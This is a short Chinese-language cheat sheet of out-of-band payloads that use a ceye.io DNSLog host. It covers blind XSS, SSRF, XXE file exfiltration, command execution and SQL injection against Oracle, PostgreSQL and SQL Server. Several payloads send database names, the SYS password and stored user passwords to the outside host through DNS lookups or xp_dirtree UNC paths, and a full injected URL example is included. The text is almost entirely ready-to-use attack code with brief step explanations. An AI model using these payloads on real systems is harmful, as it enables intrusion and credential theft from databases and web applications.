XSS
XSS 盲打在安全测试的时候是比较常用的
payload: "<script src=http://XSS.XXXXX.ceye.io></script>"
SSRF
payload: "... <!ENTITY test SYSTEM "SSRF.xxxx.ceye.io\\aa"> ..."
XXE
<!ENTITY % all
"<!ENTITY % send SYSTEM 'http://XXXX.ceye.io/%file;'>"
>
%all;
命令执行
payload: " ping %PATH%.pxxx.ceye.io ..."
oracle
SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.asdfg.ceye.io');
SELECT UTL_HTTP.REQUEST('http://ip.port.asdfg.ceye.io/oracle') FROM DUAL;
SELECT HTTPURITYPE('http://ip.port.asdfg.ceye.io/oracle').GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT(('oracle.ip.port.asdfg.ceye.io',80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.asdfg.ceye.io',80) FR
postgreSQL
DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function() RETURNS VOID AS $$ DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN SELECT INTO query_result (select encode(pass::bytea,'hex') from test_user where id =1);
exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.pSQL.3.nk40ci.ceye.io\\\\foobar.txt\'';
EXECUTE exec_cmd;
END;
$$ LANGUAGE plpgSQL SECURITY DEFINER;
SELECT temp_function();
SQL Server
存储程序master..xp_dirtree()用于获取所有文件夹的列表和给定文件夹内部的子文件夹。
DECLARE @host varchar(1024);
注册一个名为@host的变量,类型为varchar。
SELECT @host=CONVERT(varchar(1024),db_name())+'.xxxxxxxxx.ceye.io';
获取db_name()然后转换成varchar类型,然后吧获取的db_name()返回值拼接到dnslog平台给我们的子域名里面,然后赋值给@host变量。
EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');
列远程主机的foobar$目录,由于是远程主机,所以会做一个dns解析,这样我们的dns平台就能得到日志了
http://xxxx.com.cn/?Id=123';DECLARE @host varchar(1024);SELECT @host=CONVERT(varchar(1024),db_name())+'.xxxxxxxxx.ceye.io';EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');--
msSQL
DECLARE @host varchar(1024);
SELECT @host=(SELECT master.dbo.fn_varbintohexstr(convert(varbinary,rtrim(pass)))
FROM test.dbo.test_user where [USER] = 'admin')%2b'.cece.nk40ci.ceye.io';
EXEC('master..xp_dirtree "\'%2b@host%2b'\foobar$"');
参考自知识盒子